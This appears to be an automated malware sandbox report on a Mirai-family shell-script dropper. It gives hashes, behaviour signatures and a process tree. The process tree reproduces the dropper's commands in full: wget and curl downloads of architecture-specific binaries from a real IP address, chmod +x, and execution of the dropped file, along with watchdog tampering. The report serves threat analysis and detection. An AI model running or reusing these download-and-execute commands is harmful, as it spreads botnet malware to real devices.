Analysis
-
max time kernel
149s -
max time network
142s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
03-01-2025 03:38
Static task
static1
Behavioral task
behavioral1
Sample
74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh
Resource
debian9-mipsbe-20240729-en
General
-
Target
74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh
-
Size
2KB
-
MD5
ed9afc8adb1a34f93090873f6b76ec07
-
SHA1
13b5f418f63a32c61e493995e10e3baa0b02caab
-
SHA256
74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091
-
SHA512
3ef263bf7ef4cadcc3587d3ef891289cb051087c9d125a74fc8f34f16cda89ca79c2a5ae6f2d0edee3f87855de37af4a594779d6d0d332beade0654e102bd049
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 865 chmod 743 chmod 812 chmod 842 chmod 899 chmod 905 chmod 750 chmod 789 chmod 830 chmod 881 chmod 887 chmod 893 chmod 756 chmod 771 chmod 822 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/WTF 744 WTF /tmp/WTF 751 WTF /tmp/WTF 757 WTF /tmp/WTF 772 WTF /tmp/WTF 791 WTF /tmp/WTF 814 WTF /tmp/WTF 823 WTF /tmp/WTF 831 WTF /tmp/WTF 844 WTF /tmp/WTF 866 WTF /tmp/WTF 882 WTF /tmp/WTF 888 WTF /tmp/WTF 894 WTF /tmp/WTF 900 WTF /tmp/WTF 906 WTF -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog WTF File opened for modification /dev/misc/watchdog WTF -
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog WTF File opened for modification /bin/watchdog WTF -
resource yara_rule behavioral4/files/fstream-1.dat upx behavioral4/files/fstream-4.dat upx -
description ioc Process File opened for reading /proc/902/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/834/cmdline WTF File opened for reading /proc/878/cmdline WTF File opened for reading /proc/712/cmdline WTF File opened for reading /proc/805/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/885/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/706/cmdline WTF File opened for reading /proc/890/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/684/cmdline WTF File opened for reading /proc/692/cmdline WTF File opened for reading /proc/711/cmdline WTF File opened for reading /proc/842/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/876/cmdline WTF File opened for reading /proc/877/cmdline WTF File opened for reading /proc/895/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/683/cmdline WTF File opened for reading /proc/720/cmdline WTF File opened for reading /proc/714/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/857/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/419/cmdline WTF File opened for reading /proc/713/cmdline WTF File opened for reading /proc/894/cmdline WTF File opened for reading /proc/826/cmdline WTF File opened for reading /proc/855/cmdline WTF File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/676/cmdline WTF File opened for reading /proc/843/cmdline WTF File opened for reading /proc/903/cmdline WTF File opened for reading /proc/670/cmdline WTF File opened for reading /proc/801/cmdline WTF File opened for reading /proc/817/cmdline WTF -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 746 wget 748 curl 749 cat -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/wind.x86 curl File opened for modification /tmp/wind.x86_64 curl File opened for modification /tmp/wind.arm5 curl File opened for modification /tmp/WTF 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh File opened for modification /tmp/wind.arm5 wget File opened for modification /tmp/wind.arm6 wget File opened for modification /tmp/wind.sh4 curl File opened for modification /tmp/wind.arc curl File opened for modification /tmp/wind.spc wget File opened for modification /tmp/wind.spc curl File opened for modification /tmp/wind.x86 wget File opened for modification /tmp/wind.mpsl wget File opened for modification /tmp/wind.arm7 wget File opened for modification /tmp/wind.arm curl File opened for modification /tmp/wind.arm6 curl File opened for modification /tmp/wind.i468 curl File opened for modification /tmp/wind.i686 curl File opened for modification /tmp/wind.mpsl curl File opened for modification /tmp/wind.arm wget File opened for modification /tmp/wind.m68k wget File opened for modification /tmp/wind.sh4 wget File opened for modification /tmp/wind.mips wget File opened for modification /tmp/wind.mips curl File opened for modification /tmp/wind.arc wget File opened for modification /tmp/wind.arm7 curl File opened for modification /tmp/wind.ppc wget File opened for modification /tmp/wind.ppc curl File opened for modification /tmp/wind.m68k curl
Processes
-
/tmp/74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh/tmp/74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh1⤵
- Writes file to tmp directory
PID:714 -
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.x862⤵
- Writes file to tmp directory
PID:717
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/catcat wind.x862⤵PID:742
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-fd69a7bca26544abba877e713d2f3c2f-systemd-timedated.service-6qOwH1 wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:744
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:746
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:748
-
-
/bin/catcat wind.mips2⤵
- System Network Configuration Discovery
PID:749
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-fd69a7bca26544abba877e713d2f3c2f-systemd-timedated.service-6qOwH1 wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:751
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arc2⤵
- Writes file to tmp directory
PID:753
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:754
-
-
/bin/catcat wind.arc2⤵PID:755
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-fd69a7bca26544abba877e713d2f3c2f-systemd-timedated.service-6qOwH1 wind.arc wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:756
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:757
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.i4682⤵PID:759
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.i4682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/catcat wind.i4682⤵PID:769
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-fd69a7bca26544abba877e713d2f3c2f-systemd-timedated.service-6qOwH1 wind.arc wind.i468 wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:772
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.i6862⤵PID:774
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/catcat wind.i6862⤵PID:788
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-fd69a7bca26544abba877e713d2f3c2f-systemd-timedated.service-6qOwH1 wind.arc wind.i468 wind.i686 wind.mips wind.x86 WTF2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:791
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.x86_642⤵PID:793
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:800
-
-
/bin/catcat wind.x86_642⤵PID:811
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-fd69a7bca26544abba877e713d2f3c2f-systemd-timedated.service-6qOwH1 wind.arc wind.i468 wind.i686 wind.mips wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:814
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.mpsl2⤵
- Writes file to tmp directory
PID:816
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/catcat wind.mpsl2⤵PID:821
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-fd69a7bca26544abba877e713d2f3c2f-systemd-timedated.service-6qOwH1 wind.arc wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:823
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm2⤵
- Writes file to tmp directory
PID:827
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/catcat wind.arm2⤵PID:829
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh systemd-private-fd69a7bca26544abba877e713d2f3c2f-systemd-timedated.service-6qOwH1 wind.arc wind.arm wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:831
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm52⤵
- Writes file to tmp directory
PID:833
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/catcat wind.arm52⤵PID:840
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh wind.arc wind.arm wind.arm5 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:844
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm62⤵
- Writes file to tmp directory
PID:847
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/catcat wind.arm62⤵PID:863
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:866
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.arm72⤵
- Writes file to tmp directory
PID:869
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/catcat wind.arm72⤵PID:880
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:882
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.ppc2⤵
- Writes file to tmp directory
PID:884
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/catcat wind.ppc2⤵PID:886
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.ppc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:888
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.spc2⤵
- Writes file to tmp directory
PID:890
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/catcat wind.spc2⤵PID:892
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.mips wind.mpsl wind.ppc wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:894
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.m68k2⤵
- Writes file to tmp directory
PID:896
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/catcat wind.m68k2⤵PID:898
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.m68k wind.mips wind.mpsl wind.ppc wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:900
-
-
/usr/bin/wgetwget http://45.95.169.120/hiddenbin/wind.sh42⤵
- Writes file to tmp directory
PID:902
-
-
/usr/bin/curlcurl -O http://45.95.169.120/hiddenbin/wind.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/catcat wind.sh42⤵PID:904
-
-
/bin/chmodchmod +x 74c5a35690cad6b7fc66a5c03b772b3d9c8787357685b4180263b927c9b70091.sh wind.arc wind.arm wind.arm5 wind.arm6 wind.arm7 wind.i468 wind.i686 wind.m68k wind.mips wind.mpsl wind.ppc wind.sh4 wind.spc wind.x86 wind.x86_64 WTF2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/WTF./WTF2⤵
- Executes dropped EXE
PID:906
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
27KB
MD531695f8e13cc48d85194f28fae5b9947
SHA1c0aeffac04584edd671c647e93cfe3732357bca4
SHA25643756b412067a771fb68c6df35ccaf2e5668de697e189cd2a6f847ed5434d20d
SHA5127c1bd7c1857a825e1ddfafc3fc67a0e9a9221ab3ed64374f7a943f91fe08e19b6c200976bae214963c7f2cd1cf3c42624e35de03d125604b1da3a3eb5c914956
-
Filesize
113KB
MD5a1fe5416e612e6715d590130c2a5a9ca
SHA1fc47c47eef1e5a037446eb9e0d2b1711bf5975a3
SHA256212660d32a279ad8f1965a28df06992c62b714d52142e5389e03b5835664043c
SHA5128213076bfba398bb77df85c68ca8d1467b5197a2082237f54017ef0124133d6f63b4b85215916576a2392835f945a6f9c09bc710898993fc99a44f1d740ca890
-
Filesize
217B
MD5b5c5bc11ee843c629fe4dc7b16d9e3c8
SHA1b4f2fc81c39d2c053c55ee06a161655f6546a372
SHA25640e81787af6d49bfd5ff0dd8a740f823899d31ddf509e41b10165b13a8cc6e39
SHA512fe3c0c15734685ad54a0068e56cd4247e7cf4716257d25e1916fc69e2c0d7a490166b3802339fff264e3e4ef86d2d4c156f5866eb931e99dce15ad64c96f1a16
-
Filesize
217B
MD57996ac0d48cf7290dc39acdf4c6cbe78
SHA16949f5ef62883990e34538ee5bfdab36b5ddddde
SHA25696db2cd9e9a66997acbc90e8f591e6b1696bb47500d1d07db2d20e3c92de70a8
SHA5120eb9e26445b177be128aa076110ff2d3488641347c17eef3f2e44b50bb9fe18f4c7fa10cccf2985801fbfd5fcc5c163cf141452850927aa58f623737a9d9488a
-
Filesize
65KB
MD5c232c1fad117a92e3a2641a8d5b0a173
SHA1d36db31c60f484389283201ef23b674f95c36b65
SHA256291e21671679a5dcec245190911c7c059c1a6ec0b74875bd990e56bbb0ec71ef
SHA512c9f1028c71922f9683c641907fcb790f3e63594788d5e6db2e41d3aa9ec4945fdaa41c209468452a24cf8428e7d40498ac001be2a5ef897743a9c0ef1ddc4c01
-
Filesize
25KB
MD5819856ae59567a9a45f09a578a8701d6
SHA1f10479dba7d8ce69c749bd30461ba4a1e0a75833
SHA256f1eb1a307496e1f0468c7a40e8b64d35e0052d9d1654d4a06b444c8218f9be38
SHA51210223b4bb6d324eeb9d3d0313e4d16b31dbd4111fb0f9c5b5319e539277c0d05dcf67ac802b9c45fbb7248884370cc0ff0855547e5e39b8930aab2e8105090cb